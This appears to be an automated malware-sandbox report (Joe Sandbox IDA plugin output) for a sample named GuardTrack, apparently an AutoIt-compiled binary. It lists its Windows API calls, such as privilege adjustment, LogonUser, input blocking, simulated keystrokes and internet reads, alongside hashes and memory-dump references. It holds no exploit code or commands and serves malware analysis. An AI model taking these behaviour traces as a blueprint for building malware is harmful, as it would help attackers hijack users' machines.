                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                          • String ID: .lnk
                                                          • API String ID: 2683427295-24824748
                                                          • Opcode ID: a1b29fff34b846460641f1b375c609dba83f2f1fb1cdf071e96643e0fee2a0b5
                                                          • Instruction ID: df07c9c269e5b84324ca48068a00da61002dc00d6832ff0f8960716bc179dd6c
                                                          • Opcode Fuzzy Hash: a1b29fff34b846460641f1b375c609dba83f2f1fb1cdf071e96643e0fee2a0b5
                                                          • Instruction Fuzzy Hash: 34A13971104206AFD310EF64C885EABBBE9FF95714F04491CF155972A2EB70EA49CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: 85a9d80f1ccc4d819b8e74497d6a56f30d41f467a3c420ae0445c86914bd8075
                                                          • Instruction ID: 4876e6c76a592d422bc6df4660561ea88e419fee195c27e3df3e8c7554bd9d05
                                                          • Opcode Fuzzy Hash: 85a9d80f1ccc4d819b8e74497d6a56f30d41f467a3c420ae0445c86914bd8075
                                                          • Instruction Fuzzy Hash: E4D01D7180411DEAC7149650C94CDFA7B7DFB44300F541852F705D1081D63957589A16
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00622AAD
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00622AE4
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: 035f2fe1164c8e6b8c9efbc8a52c25748504738107bb7da7efa23236852ba787
                                                          • Instruction ID: db4c4cd5591ff90bf7d06d4bc047e1edcc576aea92185e104097eab5e4b11abb
                                                          • Opcode Fuzzy Hash: 035f2fe1164c8e6b8c9efbc8a52c25748504738107bb7da7efa23236852ba787
                                                          • Instruction Fuzzy Hash: 4741F671600A1BBFEB20DE55EC95EFBB7AEEB40754F10401EF601A6681EA709E419E60
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0061B986
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0061B9E0
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0061BA2D
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: 80b8c42f82d2e38e6a71f6b9b50774ad76163f458b7aa6f61de110f46c91b829
                                                          • Instruction ID: f657dcdd4bda554ba6e04550d80e0c5e5919db2b02d140a6beac17a71481150e
                                                          • Opcode Fuzzy Hash: 80b8c42f82d2e38e6a71f6b9b50774ad76163f458b7aa6f61de110f46c91b829
                                                          • Instruction Fuzzy Hash: A7218E35A00118EFCB00EFA5D884AEEBBB9FF89310F1481A9E905A7352DB31A955CB50
                                                          APIs
                                                            • Part of subcall function 005D0FE6: std::exception::exception.LIBCMT ref: 005D101C
                                                            • Part of subcall function 005D0FE6: __CxxThrowException@8.LIBCMT ref: 005D1031
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006093E3
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00609410
                                                          • GetLastError.KERNEL32 ref: 0060941D
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: bae7c48b20caefd6ee583090ca753cabe807db25441df7aa6b0c0bc4903658af
                                                          • Instruction ID: 1f90698634111f48334971e46e0838561e97605a9074ea8717f09b129b99363a
                                                          • Opcode Fuzzy Hash: bae7c48b20caefd6ee583090ca753cabe807db25441df7aa6b0c0bc4903658af
                                                          • Instruction Fuzzy Hash: 6E114FB1414205AFE728DF54EC89D6BBBFEFB48710B20852EF45996791EB70AC41CB60
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00614271
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 006142B2
                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006142BD
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 33631002-0
                                                          • Opcode ID: 8e3b5f65548bf5ec11bb49cd1ca3eec64b359fe84c30a5b8b54177ff4972b08c
                                                          • Instruction ID: 8b5567af8116c269a59434a6fd6bc104953cc844ebe53750e348185e4f1619da
                                                          • Opcode Fuzzy Hash: 8e3b5f65548bf5ec11bb49cd1ca3eec64b359fe84c30a5b8b54177ff4972b08c
                                                          • Instruction Fuzzy Hash: D6115E75E01228BFEB108FA5AC44BEFBFBDEB45B60F104166FD04E7290C6705A419BA1
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00614F45
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00614F5C
                                                          • FreeSid.ADVAPI32(?), ref: 00614F6C
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 8ca8673af7997a3da3a1e71382640ac29c8bfff651ed7dd00910f5d7f5a28d3b
                                                          • Instruction ID: 7dd540c64c050056623898bfe03df517139fd4258ddfcb9ded9717d99fbd7d4c
                                                          • Opcode Fuzzy Hash: 8ca8673af7997a3da3a1e71382640ac29c8bfff651ed7dd00910f5d7f5a28d3b
                                                          • Instruction Fuzzy Hash: 62F04F7991130CBFEF00DFE0DC89AADB7BDEF08601F005469AA01E2280D7345A448B50
                                                          APIs
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00611B01
                                                          • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00611B14
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: InputSendkeybd_event
                                                          • String ID:
                                                          • API String ID: 3536248340-0
                                                          • Opcode ID: 29c088ec920ab0e960656805c3da64e258365e6ac00b9d6e88f37c8618b51d0e
                                                          • Instruction ID: 51728059213d65cb63a486a640ce6511d7fe0e4c085357a80bd5734a87c11071
                                                          • Opcode Fuzzy Hash: 29c088ec920ab0e960656805c3da64e258365e6ac00b9d6e88f37c8618b51d0e
                                                          • Instruction Fuzzy Hash: 5CF0497590420DABEB04CF94C805BFE7BB5FF04316F00804AFE559A292D3799615DF94
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00629B52,?,0064098C,?), ref: 0061A6DA
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00629B52,?,0064098C,?), ref: 0061A6EC
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 37096b77eef98e5f169da4d7f43d4794701bc8f8e65ef862993eaa0691ef5c71
                                                          • Instruction ID: 87190a350baec1a1a65cae14500a30f017fb5d9875db3a28ebd9994592c08fdc
                                                          • Opcode Fuzzy Hash: 37096b77eef98e5f169da4d7f43d4794701bc8f8e65ef862993eaa0691ef5c71
                                                          • Instruction Fuzzy Hash: 8AF0E23540522EBBEB20AFA4CC48FEA3B6DBF09361F008255B90892181D6309A40CBE1
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00608F27), ref: 00608DFE
                                                          • CloseHandle.KERNEL32(?,?,00608F27), ref: 00608E10
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: f3efaa592d0f0021ce0befa531439813769917c9b02e174656857ea4c150fda1
                                                          • Instruction ID: eb9bb6d4348cbd9b22fdd7389313a5ef3cdd6717e6fa259b9c298e48cc69d18d
                                                          • Opcode Fuzzy Hash: f3efaa592d0f0021ce0befa531439813769917c9b02e174656857ea4c150fda1
                                                          • Instruction Fuzzy Hash: 0BE09A75010611EFF7262B54EC09D777BAAEB04210714891AF59580570DA715C90DB50
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,0000FFFF,005D8F87,0000FCD7,?,?,00000001), ref: 005DA38A
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005DA393
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 9b5a708716cac9b82e01d03f8a16f363bb374cf5b39630858c19ea1d164b8b81
                                                          • Instruction ID: 9d96fa8311f953a58b7b5accccb23ea441458003368914bf1f091a4790cf6b86
                                                          • Opcode Fuzzy Hash: 9b5a708716cac9b82e01d03f8a16f363bb374cf5b39630858c19ea1d164b8b81
                                                          • Instruction Fuzzy Hash: 2FB09235064219EBEB422F91EC09B883F6AEB46A62F005010FB0D44060CF7254508A91
                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 006245F0
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: 61b34679186db2c46d0ca72be1191f0a8cf09372bfa66d21cedccfb230fb6119
                                                          • Instruction ID: 0dbc67751d2195473fa49d4872ea1a9662486aa3b84a6f1ded858e5c65813434
                                                          • Opcode Fuzzy Hash: 61b34679186db2c46d0ca72be1191f0a8cf09372bfa66d21cedccfb230fb6119
                                                          • Instruction Fuzzy Hash: 9CE0DF3521022A9FD310AF59E808A8AFBE9AF94760F00841AFD49D7311DE70F8018F90
                                                          APIs
                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00615205
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: bf9a9f4315109cbc4428cafa0e0a97a83f10de277a4e070b644af36c691cd992
                                                          • Instruction ID: 8e14c917d123a0c14bd74e67b33615dfe13265462da1b56b0f2d2801e8ef8695
                                                          • Opcode Fuzzy Hash: bf9a9f4315109cbc4428cafa0e0a97a83f10de277a4e070b644af36c691cd992
                                                          • Instruction Fuzzy Hash: 1CD01794160A09F8E95A03248A0FFF6820BE3817C0F9C414A7103851C1E89058CA9421
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00608FA7), ref: 00609389
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: 9f66d069d5b897b6283c373c25ff9a401e237b75e542fc9344e96b41ae870989
                                                          • Instruction ID: 62e52c2f8bf5a1543e262526c0a5a17a631f39c6d97c1c97f949ff49f61eb813
                                                          • Opcode Fuzzy Hash: 9f66d069d5b897b6283c373c25ff9a401e237b75e542fc9344e96b41ae870989
                                                          • Instruction Fuzzy Hash: 53D05E3226051EABEF018EA4DC01EAE3B6AEB04B01F408111FE15C50A0C775D835AB60
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,?), ref: 005F0734
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: de490cc5b30a77cd212c0ff7c719319ab5a7ebd24fb564c0dd85bad4416a639f
                                                          • Instruction ID: 189204782d5adbb0d91a44760c6366a092b4c8e3c11795b52e91907f391500df
                                                          • Opcode Fuzzy Hash: de490cc5b30a77cd212c0ff7c719319ab5a7ebd24fb564c0dd85bad4416a639f
                                                          • Instruction Fuzzy Hash: 61C04CF581011DDBDB15DBA0D988EFE7BBDBB04304F141455A205B2140D7789B448A71
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 005DA35A
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 95b9e50c68f9d2f811ad64dd57bf8f6f363c810bb6c2e8eeee2e67d3654ef24d
                                                          • Instruction ID: 75475fdad5af00ca719e3bb1fe8c679686e4ed7aec53e9b7a6354e1bff44d82d
                                                          • Opcode Fuzzy Hash: 95b9e50c68f9d2f811ad64dd57bf8f6f363c810bb6c2e8eeee2e67d3654ef24d
                                                          • Instruction Fuzzy Hash: AEA0243003010CF7CF011F41FC044447F5DD7015507004010F50C00031CF33541045C0
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00627F45
                                                          • DeleteObject.GDI32(00000000), ref: 00627F57
                                                          • DestroyWindow.USER32 ref: 00627F65
                                                          • GetDesktopWindow.USER32 ref: 00627F7F
                                                          • GetWindowRect.USER32(00000000), ref: 00627F86
                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006280C7
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006280D7
                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0062811F
                                                          • GetClientRect.USER32(00000000,?), ref: 0062812B
                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00628165
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00628187
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0062819A
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281A5
                                                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281AE
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281BD
                                                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281C6
                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281CD
                                                          • GlobalFree.KERNEL32(00000000), ref: 006281D8
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006281EA
                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00643C7C,00000000), ref: 00628200
                                                          • GlobalFree.KERNEL32(00000000), ref: 00628210
                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00628236
                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00628255
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00628277
                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00628464
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                          • API String ID: 2211948467-2373415609
                                                          • Opcode ID: d9d76a1686ac398a08a2a39bc2ea062dbb1375320d7c2b625382469be4959ee7
                                                          • Instruction ID: 501599dfd3894edbaf50ce9f2307956898decf2e8b581b19bc9f9564ad5f6ead
                                                          • Opcode Fuzzy Hash: d9d76a1686ac398a08a2a39bc2ea062dbb1375320d7c2b625382469be4959ee7
                                                          • Instruction Fuzzy Hash: D9027F75900525EFDB14DFA4DC89EAE7BBAFB49310F048158FA15AB2A1DB30AD41CF60
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,00640980), ref: 00633C65
                                                          • IsWindowVisible.USER32(?), ref: 00633C89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
